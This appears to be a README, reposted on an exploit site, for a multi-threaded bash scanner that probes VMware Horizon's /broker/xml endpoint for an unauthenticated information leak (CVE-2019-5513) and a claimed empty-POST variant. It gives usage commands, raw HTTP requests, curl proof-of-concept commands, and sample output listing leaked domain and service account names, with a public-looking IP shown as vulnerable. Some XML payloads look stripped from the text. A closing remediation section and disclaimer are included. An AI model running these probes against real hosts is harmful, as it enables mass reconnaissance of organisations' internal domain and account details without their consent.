Exploit for CVE-2019-5513

## https://sploitus.com/exploit?id=33F9D9CE-4D8F-59D4-AEF9-30A887B56326
# VMware Horizon /broker/xml Vulnerability Scanner

[![Security](https://img.shields.io/badge/security-bug%20bounty-red)](https://github.com)
[![Bash](https://img.shields.io/badge/shell-bash-green)](https://www.gnu.org/software/bash/)
[![License](https://img.shields.io/badge/license-MIT-blue)](LICENSE)

A high-performance multi-threaded scanner to detect unauthenticated information disclosure vulnerabilities in VMware Horizon Connection Server's `/broker/xml` endpoint.

## 📋 Overview

VMware Horizon Connection Server exposes an XML API endpoint (`/broker/xml`) that can leak sensitive internal configuration information without requiring authentication. This scanner quickly identifies vulnerable servers by testing **two attack vectors**:

1. **Empty POST Body (Zero-Day Discovery)** — Sends a completely empty POST request. The server leaks configuration data without any XML command.
2. **Crafted XML (CVE-2019-5513)** — Uses the documented `get-configuration` XML command.

## 🔍 Vulnerability Details

| Attribute | Value |
|-----------|-------|
| **CVE** | CVE-2019-5513 |
| **CVSS Score** | 5.3 (Medium) |
| **Vector** | AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| **Affected Products** | VMware Horizon Connection Server 7.x before 7.8, 7.5.x before 7.5.2, 6.x before 6.2.8 |
| **Information Leaked** | Active Directory domain name, service account name (machine account), internal hostnames, gateway IP addresses |

### What Information Can Be Leaked?

```xml


    
        
            kerberos
            HORIZONSERVER$@CORPORATEDOMAIN.EXAMPLE.COM
        
        corporate-domain.example.com
    


⚡ Features
- Blazing Fast — Multi-threaded architecture (default 50 concurrent threads)

- Dual Protocol Testing — Checks both HTTPS (port 443) and HTTP (port 80) simultaneously

- Two Attack Vectors — Tests empty POST body (zero-day) + crafted XML (CVE-2019-5513)

- Low Timeouts — 5 second max per request, 3 second connection timeout

- Clear Output — Color-coded results with full XML response for vulnerable hosts

- Results Export — Save all findings to a file with -o option

- No Dependencies — Uses only curl (standard on most systems)

🚀 Installation
bash
# Clone the repository
git clone https://github.com/sudosu01/CVE-2019-5513-scanner/vmware-horizon-scanner.git
cd vmware-horizon-scanner

# Make the script executable
chmod +x broker.sh
📖 Usage
Basic Scan
bash
./broker.sh -d targets.txt
Scan with Custom Threads (Faster)
bash
./broker.sh -d targets.txt -t 100
Scan and Save Results
bash
./broker.sh -d targets.txt -t 100 -o results.txt
Command Line Options
Option	Description
-d 	Input file containing list of IP addresses/hostnames (one per line)
-t 	Number of threads (default: 50)
-o 	Output file to save results
-h	Show help message
Input File Format (targets.txt)
text
# Comments start with #
185.171.101.236
192.168.1.100
10.0.0.50
example-vmware.com
📊 Example Output
text
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   VMware Horizon /broker/xml Vulnerability Scanner
   Multi-Threaded Mode - 50 threads
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] Testing: Empty POST (Zero-Day) + Crafted XML (CVE-2019-5513)
[*] Protocols: HTTPS + HTTP (both tested simultaneously)

[*] Scanning 3 hosts...

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 185.171.101.236 | VULNERABLE | HTTPS | EMPTY_POST
Response:


    
        
            kerberos
            TEST-SERVER$@DOMAIN
        
    

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[-] 192.168.1.100 | NOT VULNERABLE

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 10.0.0.50 | VULNERABLE | HTTP | CRAFTED_XML
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[*] SCAN COMPLETE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    Total hosts: 3
    Vulnerable: 2
    Not vulnerable: 1
    Time taken: 4 seconds
🔬 Testing with Burp Suite
For manual testing, here are the raw requests:

Test 1: Empty POST Body (Zero-Day)
http
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 0
Test 2: Crafted XML (CVE-2019-5513)
http
POST /broker/xml HTTP/1.1
Host: target.example.com
Content-Type: text/xml
User-Agent: VMware-Horizon-Client
Content-Length: 115


📝 PoC curl Commands
Empty POST Body
bash
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  -d ''
Crafted XML
bash
curl -k -X POST "https://target/broker/xml" \
  -H "Content-Type: text/xml" \
  -H "User-Agent: VMware-Horizon-Client" \
  --data-binary ''
🛡️ Remediation
Upgrade VMware Horizon Connection Server to a patched version:

Version	Fixed Release
7.x	7.8 or later
7.5.x	7.5.2 or later
6.x	6.2.8 or later
Additional Mitigations:

Implement network access controls to restrict access to /broker/xml endpoint

Use WAF rules to block unauthenticated requests to this endpoint

Monitor for suspicious POST requests to /broker/xml

🙏 Credits
This tool is based on research by the following security researchers:

Original CVE-2019-5513 Discovery — Atredis Partners

Cory Mathews of Critical Start (independent discovery)

Zero-Day Discovery in This Tool
The empty POST body attack vector was identified during additional research. The original CVE required a crafted XML payload; this tool also tests the empty body method, which requires no payload construction and is even simpler to execute.

⚠️ Disclaimer
This tool is for educational purposes and authorized security testing only. Unauthorized scanning of systems you do not own or have explicit permission to test may violate laws and regulations. The authors assume no liability for misuse.

📄 License
MIT License

⭐ Support
If you find this tool useful, please give it a star on GitHub!